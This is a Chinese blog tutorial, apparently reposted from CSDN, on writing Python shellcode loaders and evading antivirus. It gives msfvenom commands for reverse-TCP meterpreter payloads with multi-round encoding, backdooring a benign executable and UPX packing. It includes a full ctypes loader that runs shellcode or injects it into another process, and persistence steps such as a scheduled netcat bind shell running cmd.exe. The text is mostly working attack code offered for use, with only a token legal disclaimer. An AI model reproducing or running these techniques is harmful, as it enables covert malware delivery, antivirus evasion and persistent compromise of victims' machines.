如何用python编写shellcode并且免杀
作者:互联网
大家好,我是铁汉fhoenix,今天和大家聊聊shellcode。
什么是shellcode
我在这里简单讲一下什么是Shellcode。Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务的。
今天 让我来教大家如何编写py shellcode并且免杀,注入,以及转换成windows可执行文件
利用生成cpu可执行的代码
msfvenom -p windows/x64/exec CMD='calc.exe' -f py
msfvenom -p windows/exec CMD='calc.exe' EXITFUNC=thread -f py
当然,你也可以进行免杀
下面是我以前在freebuf写的文章中的部分内容
通常msf裸奔肯定会被某绒查杀,所以使用msf多重编码是个好主意。上代码!
msfvenom -p windows/meterpreter/rever_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shiata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o a.exe
10次s编码,5次a编码,10次s编码,最后再来10次c编码。nice!
随便弄一个叫cc.exe的可执行文件。
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -e x86/shikata_ga_nai -x cc.exe -i 5 -f exe -o cc2.exe
用shi对cc进行5次编码,当然你也可以进行多重编码。最后生成注入后的程序cc2。噢噢噢噢,对了你可以增加一个-k参数,配置攻击载荷在独立的线程内启动,这样不会对cc有所影响。
最后就是upx加壳
upx -5 cc2.exe -k
shellcode编写
这里我们要调用windows底层api函数,分配内存,给予进程所有权限。。。
这里直接上代码
from ctypes import *
from ctypes.wintypes import *
import sys
PAGE_EXECUTE_READWRITE = 0x00000040 # 区域可执行代码,可读可写
MEM_COMMIT = 0x3000 # 分配内存
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF ) #给予进程所有权限# windows api
VirtualAlloc = windll.kernel32.VirtualAlloc
RtlMoveMemory = windll.kernel32.RtlMoveMemory
CreateThread = windll.kernel32.CreateThread
WaitForSingleObject = windll.kernel32.WaitForSingleObject
OpenProcess = windll.kernel32.OpenProcess
VirtualAllocEx = windll.kernel32.VirtualAllocEx
WriteProcessMemory = windll.kernel32.WriteProcessMemory
CreateRemoteThread = windll.kernel32.CreateRemoteThread# msfvenom -p windows/x64/exec CMD='calc.exe' -f py
shellcode = bytearray(
b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
b"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
b"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
b"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
b"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
b"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
b"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
b"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
b"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
b"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
b"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
b"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
b"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
b"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
b"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
b"\x63\x2e\x65\x78\x65\x00"
)# msfvenom -p windows/exec CMD='calc.exe' EXITFUNC=thread -f py
shellcode1 = b""
shellcode1 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
shellcode1 += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
shellcode1 += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
shellcode1 += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
shellcode1 += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
shellcode1 += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
shellcode1 += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
shellcode1 += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
shellcode1 += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
shellcode1 += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
shellcode1 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode1 += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
shellcode1 += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
shellcode1 += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
shellcode1 += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
shellcode1 += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
shellcode1 += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
shellcode1 += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41"
shellcode1 += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode1 += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
shellcode1 += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
shellcode1 += b"\x78\x65\x00"
def run1():
VirtualAlloc.restype = ctypes.c_void_p # 重载函数返回类型为void
p = VirtualAlloc(c_int(0), c_int(len(shellcode)), MEM_COMMIT, PAGE_EXECUTE_READWRITE) # 申请内存
buf = (c_char * len(shellcode)).from_buffer(shellcode) # 将shellcode指向指针
RtlMoveMemory(c_void_p(p), buf, c_int(len(shellcode))) # 复制shellcode进申请的内存中
h = CreateThread(c_int(0), c_int(0), c_void_p(p), c_int(0), c_int(0), pointer(c_int(0))) # 执行创建线程
WaitForSingleObject(c_int(h), c_int(-1)) # 检测线程创建事件
def run2(pid):
h_process = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if h_process:
p = VirtualAllocEx(h_process, c_int(0), c_int(len(shellcode1)), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
WriteProcessMemory.argtypes = [HANDLE, LPVOID, LPCVOID, c_size_t, POINTER(c_size_t)]
WriteProcessMemory.restype = BOOL
buf = create_string_buffer(shellcode1)
WriteProcessMemory(h_process, p, shellcode1, sizeof(buf), byref(c_size_t(0)))
else:
print("无法打开进程pid: %s" % pid)
sys.exit()CreateRemoteThread(h_process, None, c_int(0), p, None, 0, byref(c_ulong(0)))
if __name__ == "__main__":
try:
if sys.argv[1]:
run2(int(sys.argv[1]))
else:
run1()
except IndexError:
run1()
这里我建议自定义的shellcode参数最好改掉,不然不怕火绒会检查出敏感词汇。。。
这里我设定的一个检查注入,就是你在执行这个程序的时候需要而外填写,你们可以改掉
剩下我就不多说了,看代码(我懒得打字)
转换为windows可执行exe文件
pyinstaller -f a.py
这里要在windows机器上面执行!pyinstall你们应该都听过。。。
拓展
下面是我以前在freebuf写的文章中的部分内容
1.在目标运行M马,取得shell以后。可以先查询进程然后进行注入,这里我们用最简单的方法。直接输入run post/windows/manage/migrate 模块注入它会自动寻找合适的进程注入,并且自动迁移进程。
2.通过msf自带的persistence模块可以设置启动项来进行维持。下面我来解释一下,拿到shell以后输入run persistence -P windows/x64/meterper/reverse_tcp -X -i 5 -p 12345 -r 192.168.X.X 配置开机自启动,并且每次尝试连接的时间间隔为5秒。然后我们退出,输入exit,重新配置,开启监听后可以发现不要重新上传shell就可以立即拿到shell
3.通过metsvc模块可以在已经获取shell的设备上面开启一个服务来提供后M功能。自动安装后M run metsvc -A,他会自动创建一个端口为31337的服务,并且传输3个文件
4.通过scheduleme来创建计划任务,但是要system权限。在我们获取shell后输入getuid获取当前权限,运行getsystem把系统提升为system权限。这里我们又要用到大名鼎鼎的nc了,上传nc并创建计划任务,每分钟执行一次nc -Ldp 4444 -e cmd.exe,输入run scheduleme -m 1 -e '/nc.exe' -o "-Ldp 4444 -e cmd.exe"。之后需要连接shell的时候直接输入nc -v 192.168.0.108 4444,用nc进行shell连接
5.通过autorunscript进行迁移进程。设定完lhost,lprot后输入set AutoRunScript post/windows/manage/migrate 然后run。我这里显示已经自动把进程迁移到了pid为1680的进程
6.通过empire进行维持权限,他是一个基于powershell的渗透测试框架,具体我就不说了。github地址https:github.com/EmpireProject/Empire
请勿用作违法行为,本人对此不负法律责任!
好的,今天就到这里,希望对你们有帮助,我是铁汉fhoenix,再见~
标签:shellcode1,免杀,x41,python,x48,x8b,x01,x00,shellcode 来源: https://blog.csdn.net/m0_46682482/article/details/119277974